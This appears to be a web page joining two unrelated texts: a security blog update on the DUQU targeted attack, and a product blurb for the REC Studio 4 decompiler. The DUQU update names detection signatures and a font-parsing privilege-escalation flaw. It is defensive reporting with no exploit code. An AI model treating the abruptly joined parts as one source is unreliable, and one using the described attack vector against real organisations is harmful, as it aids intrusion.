This new information allows us to have more educated theories of how the DUQU attack took place. Considering the usage of a Microsoft Word document, it is likely that this was initially deployed through email messages sent to employees in the targeted organization. This further verifies our earlier hypothesis that DUQU is part of a highly targeted attack aimed at exfiltrating information from targeted entities. For more information on DUQU and the nature of highly targeted attacks, please check the following reports:

We have created the proactive detections TROJ_DUQUCFG.SME and RTKT_DUQU.SME to address future variants of DUQU component files. Also, the Threat Discovery Appliance (TDA) protects enterprise networks by detecting network activity and the malware's connection to the C&C server through the rules 473 TCP_MALICIOUS_IP_CONN, 528 HTTP_Request_DUQU, and 529 HTTP_Request_DUQU2.

Update as of November 3, 2011, 8:30 PM PST

Microsoft released a security advisory regarding the vulnerability used by DUQU.
The vulnerability exists in the Win32k TrueType font parsing engine and allows elevation of privilege. According to the advisory, a successful exploitation can allow an attacker to run arbitrary code in kernel mode.
We are currently collecting more information about this, and will update this blog entry with our findings as soon as possible.

Rec Studio 4 – Reverse Engineering Compiler & Decompiler

REC Studio is an interactive decompiler. It reads a Windows, Linux, Mac OS X or raw executable file, and attempts to produce a C-like representation of the code and data used to build the executable file. It has been designed to read files produced for many different targets, and it has been compiled on several host systems.

REC Studio 4 is a complete rewrite of the original REC decompiler. It uses more powerful analysis techniques such as partial Single Static Assignment (SSA), allows loading Mac OS X files and supports 32 and 64 bit binaries.

Although still under development, it has reached a stage that makes it more useful than the old Rec Studio 2.


Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X.
Symbolic information support using Dwarf 2 and partial recognition of Microsoft’s PDB format.
C++ is partially recognized: mangled names generated by gcc are demangled, and inheritance described in Dwarf 2 is honored. However, C++ is a very broad and difficult language, so some features, like templates, will likely never be supported.
Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package.
Interactivity is supported, limited to the definition of sections, labels and function entry points. It will need to be improved to support in-program definition of types and function parameters.

Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program database file (.PDB) or CodeView (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of subroutine code and form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data.

Rec Studio 4 is available for download for Windows, Ubuntu and Mac.